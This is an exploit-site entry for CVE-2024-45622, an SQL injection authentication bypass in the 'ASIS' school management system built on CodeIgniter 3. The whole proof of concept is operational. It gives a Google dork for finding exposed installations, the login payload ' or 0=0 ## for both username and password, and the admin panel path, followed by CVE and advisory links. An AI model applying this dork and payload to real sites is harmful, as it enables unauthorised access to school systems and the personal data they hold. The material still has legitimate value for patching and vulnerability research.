Share
## https://sploitus.com/exploit?id=PACKETSTORM:181355
============================================================================================================================================  
| # Title : ASIS | Aplikasi Sistem Sekolah using CodeIgniter 3 - SQL Injection Authentication Bypass |  
| # Author : checkgue |  
| # Tested on : windows 10 (Home) / Browser : Google Chrome 128.0.6613.114 (Official Build) (64-bit) |  
| # Vendor : https://www.facebook.com/groups/181558652941070/ |  
============================================================================================================================================  
  
poc :  
  
[+] Dorking ฤฐn Google or Other Search Enggine. "ASIS | Aplikasi Sistem Sekolah"  
  
[+] Use payload : user & pass = ' or 0=0 ##  
  
[+] Panel : http://localhost/asispanel/  
  
CVE: CVE-2024-45622  
  
References:  
https://aegislens.com/home/cve-2024-45622/  
https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2024-45622  
https://www.cve.org/CVERecord?id=CVE-2024-45622  
https://nvd.nist.gov/vuln/detail/CVE-2024-45622  
https://github.com/atoz-chevara/cve/blob/main/2024/ASIS_AplikasiSistemSekolah_Using_CodeIgniter3-SQL_Injection_Authentication_Bypass.md  
https://github.com/advisories/GHSA-8hxv-6g4p-2w59  
  
Greetings to : =====  
Meta4sec * Bungker |  
====================